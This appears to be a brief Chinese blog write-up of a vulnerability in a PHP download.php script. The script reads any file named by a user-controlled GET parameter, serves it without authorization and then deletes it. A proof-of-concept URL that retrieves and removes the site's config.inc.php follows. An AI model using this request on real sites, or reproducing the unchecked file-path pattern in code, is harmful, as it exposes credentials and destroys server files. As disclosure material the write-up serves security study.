/download.php
[php]
$fname = strval($_GET[fname]);//保存的文件名 可控 无需权限
$fpath = strval($_GET[fpath]);//要下载的文件 可控 无需权限
if(!file_exists($fpath))exit;
$file=fopen($fpath,"r");
Header("Content-type: application/octet-stream");
Header("Accept-Ranges: bytes");
Header("Accept-Length: ".filesize($fpath));
Header("Content-Disposition: attachment; filename=" . $fname."");
echo fread($file,filesize($fpath));//看吧,这就下载了
fclose($file);
@unlink($fpath); 下载完后还删除了源文件...
?>
[/php]
http://localhost/download.php?fname=1.txt&fpath=./include.inc/config.inc.php
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论